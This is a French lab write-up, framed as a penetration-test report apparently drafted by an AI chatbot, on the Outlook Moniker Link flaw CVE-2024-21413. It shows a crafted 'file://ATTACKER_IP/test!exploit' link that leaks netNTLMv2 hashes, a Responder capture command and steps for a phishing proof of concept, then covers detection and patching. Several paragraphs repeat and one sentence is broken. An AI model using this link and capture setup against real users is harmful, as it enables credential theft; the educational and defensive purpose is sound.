
Le 13 février 2024, Microsoft a publié une grave vulnérabilité de sécurité dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook.
Le 13 février 2024, Microsoft a publié une vulnérabilité de sécurité critique dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413 et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook.

Excellent 👍 Voici la traduction complète + la rédaction sous forme de rapport de Test d'Intrusion (PT), en français professionnel et clair. Comme demandé – uniquement la traduction et la rédaction. Vous ajouterez les réponses, les captures d'écran et les compléments, et si vous le souhaitez, je vous aiderai par la suite.
Le 13 février 2024, Microsoft a publié une vulnérabilité de sécurité critique dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability.
Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook à l'aide d'un lien spécial (Moniker Link), et d'amener le client Outlook de la victime à vers un serveur contrôlé par l'attaquant – sans exécution de fichier et sans avertissement de sécurité efficace.
La vulnérabilité peut conduire à une fuite d'identifiants et il existe même une possibilité théorique d'exécution de code à distance (RCE) .
| Paramètre | Valeur |
|---|---|
| Identifiant | CVE-2024-21413 |
| Date de publication | 13 février 2024 |
| Découvreur | Haifei Li – Check Point Research |
| Impact | Fuite d'identifiants + RCE potentiel |
| Gravité | Critique |
| Complexité d'attaque | Faible |
| Score CVSS | 9.8 |
| Lien officiel | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
La vulnérabilité affecte les versions suivantes :
(Description de la vulnérabilité)

Microsoft Outlook permet d'afficher les e-mails au format HTML et d'analyser différents types de liens tels que http:// et https://. De plus, Outlook prend également en charge des liens spéciaux appelés Moniker Links, qui permettent de lancer des applications ou d'accéder à des ressources externes sur le système d'exploitation.
Normalement, lorsqu'un e-mail contient un lien qui lance une application externe ou accède à une ressource système (comme un lien file://), le mécanisme de sécurité Protected View d'Outlook est activé. Ce mécanisme affiche un avertissement de sécurité et bloque les actions dangereuses telles que l'exécution de code, les macros ou l'accès à des ressources réseau externes.
Cependant, une vulnérabilité a été découverte dans Outlook (CVE-2024-21413) qui permet de contourner le mécanisme Protected View par une simple manipulation d'un lien de type Moniker Link.
Ce que nous avons trouvé (Findings)
Au cours du test, il a été constaté que l'utilisation d'un lien normal du type :
file://ATTACKER_IP/test
amène Outlook à tenter d'accéder à une ressource réseau via le protocole SMB, mais cette tentative est bloquée par Protected View.
En revanche, lorsque le lien inclut le caractère spécial ! et une chaîne de texte supplémentaire, par exemple :
file://ATTACKER_IP/test!exploit
Outlook n'active pas Protected View et effectue une tentative de connexion au serveur distant.
Lors de cette tentative :
Outlook tente d'accéder à la ressource via SMB
Une demande d'authentification automatique est effectuée
Les identifiants de connexion de l'utilisateur sont envoyés à l'attaquant
Le hash Windows netNTLMv2 de la victime est capturé
Il est important de noter que le partage distant n'a pas besoin d'exister réellement, car la tentative d'authentification est effectuée dans tous les cas.
Impact
La vulnérabilité permet à un attaquant :
La fuite d'identifiants utilisateur (hash netNTLMv2)
La réalisation d'attaques hors ligne (Cracking / Pass-the-Hash)
Le déplacement latéral dans le réseau d'entreprise
De plus, étant donné que les Moniker Links utilisent le mécanisme COM (Component Object Model) de Windows, il existe une possibilité théorique d'exécution de code à distance (RCE). Cependant, à la date du test, il n'existe pas de Proof of Concept public pour une RCE réelle utilisant cette vulnérabilité.
Exploitation
Dans le cadre de l'attaque, un e-mail contenant un Moniker Link similaire à celui présenté dans la tâche précédente est envoyé à la victime. Le but de l'attaquant est de créer un e-mail avec un lien Moniker Link qui contourne le mécanisme Protected View d'Outlook, de sorte que dès que la victime clique sur le lien, son client Outlook tente de charger un fichier depuis la machine de l'attaquant. Cette action entraîne l'envoi et la capture du hash netNTLMv2 de la victime par l'attaquant.
Avant d'effectuer l'attaque, passons en revue un Proof of Concept (PoC) créé à des fins de démonstration (également disponible sur GitHub).
Auteur : CMNatic | https://github.com/cmnatic Version : 1.0 | 19/02/2024
Le code utilise le langage Python et envoie un e-mail HTML contenant un lien Moniker Link malveillant.
Description du PoC
Le PoC :
Prend une adresse e-mail d'attaquant et une adresse e-mail de victime
Nécessite un mot de passe pour l'authentification SMTP (Dans cette salle, le mot de passe pour [email protected] est : attacker)
Contient le contenu HTML de l'e-mail (html_content) avec un lien Moniker Link malveillant
Définit les champs de l'e-mail : Sujet, De, À
Envoie l'e-mail via le serveur de messagerie
Dans un scénario réel, un serveur SMTP contrôlé par l'attaquant est nécessaire (dans cette salle, le serveur est déjà fourni).
Écoute pour la capture de hash – Responder
Après l'envoi de l'e-mail, il faut exécuter un outil d'écoute de type Responder sur la machine de l'attaquant pour capturer les requêtes SMB.
Sur THM AttackBox, le nom de l'interface est ens5 :
responder -I ens5
Responder écoute les requêtes SMB, LLMNR et NBT-NS et permet la capture des identifiants d'authentification.
Ouverture de la machine victime
Ouvrez la machine victime via la fenêtre d'écran partagé
Lancez Outlook
Choisissez l'option "I don't want to sign in or create an account"
Fermez la fenêtre de saisie de la clé de produit
La boîte aux lettres de la victime est déjà préconfigurée
Exécution de l'exploit
Sur AttackBox :
Créez un nouveau fichier nommé exploit.py
Collez-y le code du PoC
Avant l'exécution, effectuez les ajustements suivants :
Mettez à jour l'adresse IP de la machine de l'attaquant dans le Moniker Link (ligne 12)
Remplacez la valeur MAILSERVER par l'adresse :
10.64.165.67
Ensuite, exécutez :
python3 exploit.py
Lorsque le mot de passe est demandé, saisissez :
attacker
Si l'opération a réussi, le message suivant s'affiche :
Email delivered
Résultat
Après avoir ouvert l'e-mail sur la machine victime et cliqué sur le lien "Click me" :
Outlook tente de se connecter à la machine de l'attaquant via SMB
Responder capture la tentative d'authentification
Le hash netNTLMv2 de l'utilisateur est capturé avec succès
L'attaque est terminée avec succès.

Detection
YARA
Une règle YARA a été créée par Florian Roth visant à identifier les e-mails contenant l'élément file:\ dans un Moniker Link – ce qui pourrait indiquer une tentative d'exploitation de CVE-2024-21413.
Exemple de la règle YARA (telle qu'elle apparaît dans la salle) :
La règle recherche des attributs généraux d'un e-mail (comme Subject: et Received:)
Et recherche en outre un motif suspect de lien file:// pointant vers un chemin UNC (\) accompagné d'une extension de fichier courante, incluant le caractère ! à la fin (caractéristique du contournement de Protected View)
(Le code lui-même reste tel quel dans l'original)
Wireshark
De plus, on peut voir la requête SMB sortant de la machine victime vers la machine attaquante dans une capture de paquets Wireshark.
Lors de la requête :
Une tentative d'authentification SMB est effectuée
On peut identifier un hash de type netNTLMv2 (parfois sous forme tronquée/abrégée)
Remediation
Prévention et durcissement (Remediation)
Microsoft a inclus des correctifs de sécurité pour remédier à cette vulnérabilité dans le cadre des mises à jour du Patch Tuesday de février. Vous pouvez consulter la liste des articles KB pertinents en fonction des versions d'Office sur le lien officiel de Microsoft.
Il est fortement recommandé de mettre à jour Microsoft Office via :
Windows Update
Microsoft Update Catalog
De plus, en attendant que les mises à jour soient appliquées sur tous les systèmes, il s'agit d'un rappel important pour la mise en œuvre de mesures de sécurité de base, et notamment pour sensibiliser les utilisateurs, par exemple :
Ne pas cliquer sur des liens aléatoires, en particulier provenant d'e-mails inattendus
Afficher un aperçu des liens avant de cliquer
Transmettre les e-mails suspects au responsable de la sécurité informatique de l'organisation
Étant donné que cette vulnérabilité contourne le mécanisme Protected View d'Outlook, il n'est pas possible de configurer Outlook pour bloquer cette attaque par de simples modifications de configuration.
De même, le blocage complet du protocole SMB n'est pas recommandé dans la plupart des organisations, car ce protocole est essentiel pour l'accès aux ressources réseau et aux partages de fichiers. Cependant, il est possible de mettre en place des blocages ou des restrictions au niveau du pare-feu, en fonction de la politique organisationnelle et de la structure du réseau.
Prévention et durcissement (Remediation)
Microsoft a inclus des correctifs de sécurité pour cette vulnérabilité dans le cadre des mises à jour du Patch Tuesday de février. Vous pouvez consulter la liste des articles KB pertinents en fonction de la version d'Office sur le lien officiel de Microsoft. Il est fortement recommandé de mettre à jour Microsoft Office via :
Windows Update
Microsoft Update Catalog
De plus, et jusqu'à ce que les mises à jour soient déployées sur tous les systèmes, il s'agit d'un rappel important pour la mise en œuvre de mesures de sécurité de base, et notamment pour sensibiliser les utilisateurs, par exemple :
Éviter de cliquer sur des liens aléatoires, en particulier provenant d'e-mails inattendus
Vérifier l'adresse du lien (aperçu) avant de cliquer
Transmettre les e-mails suspects au responsable de la sécurité informatique de l'organisation
Étant donné que cette vulnérabilité contourne le mécanisme Protected View d'Outlook, il n'est pas possible d'empêcher l'attaque par de simples modifications de configuration dans Outlook lui-même.
De même, le blocage complet du protocole SMB n'est pas recommandé dans la plupart des organisations, car ce protocole est essentiel pour l'accès aux partages de fichiers et aux ressources réseau. Cependant, il est possible de mettre en place des restrictions ou des blocages au niveau du pare-feu, en fonction de la politique de sécurité et de la structure du réseau d'entreprise.